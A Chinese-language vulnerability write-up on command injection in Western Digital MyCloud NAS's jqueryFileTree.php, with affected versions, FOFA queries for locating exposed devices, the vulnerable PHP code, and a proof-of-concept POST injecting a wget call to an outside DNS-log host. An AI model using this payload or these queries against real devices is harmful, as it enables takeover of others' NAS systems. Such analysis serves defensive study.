漏洞简介
Western Digital MyCloud NAS是一款网络附加存储设备,旨在提供集中存储和共享解决方案。它允许用户在家中或办公室通过网络访问文件,支持多种设备的备份和共享。Western Digital MyCloud NAS jqueryFileTree.php中存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
影响版本
<=2.11.153(老版本,已发布修复补丁)
fofa语法
icon_hash="-1074357885" && header="X-Powered-By: PHP/5.4.16"
body="_PROJECT_MODEL_ID_YOSEMITE " && body="_PROJECT_MODEL_ID_LIGHTNING "
漏洞分析
直接看 jqueryFileTree.php 其业务实现逻辑如下
<?php
//
// jQuery File Tree PHP Connector
//
// Version 1.01
//
// Cory S.N. LaViska
// A Beautiful Site (http://abeautifulsite.net/)
// 24 March 2008
//
// History:
//
// 1.01 - updated to work with foreign characters in directory/file names (12 April 2008)
// 1.00 - released (24 March 2008)
//
// Output a list of files for jQuery File Tree
//
//$dir = $_POST['dir'];
//$host = $_POST['host'];
//$pwd = $_POST['pwd'];
//$user = $_POST['user'];
$host = ($_POST['host'] == "")? $_GET['host']:$_POST['host'];
$pwd = ($_POST['pwd'] == "")? $_GET['pwd']:$_POST['pwd'];
$user = ($_POST['user'] == "")? $_GET['user']:$_POST['user'];
$dir = ($_POST['dir'] == "")? $_GET['dir']:$_POST['dir'];
$lang = ($_POST['lang'] == "")? $_GET['lang']:$_POST['lang'];
//echo $dir."dir1=".dir1;
error_reporting(0);
@unlink("/tmp/ftp-folder.txt");
@unlink("/tmp/ftp-file.txt");
$cmd = sprintf("ftp_download -c gettree -i \"%s\" -u \"%s\" -p \"%s\" -t \"%s\" -l \"%s\"", $host, $user, $pwd ,$dir ,$lang);
$handle = popen($cmd, 'r');
多个参数如host、pwd、user、dir、lang均未过滤或校验,被直接使用sprintf格式化拼接后使用popen进行执行命令,造成命令注入漏洞。
漏洞复现
POST /web/addons/jqueryFileTree.php HTTP/1.1
Host: west.nas.mrxn.net
Content-Type: application/x-www-form-urlencoded
host=";wget dnslog.pt;"

在DNSLOG平台成功收到DNS和HTTP请求

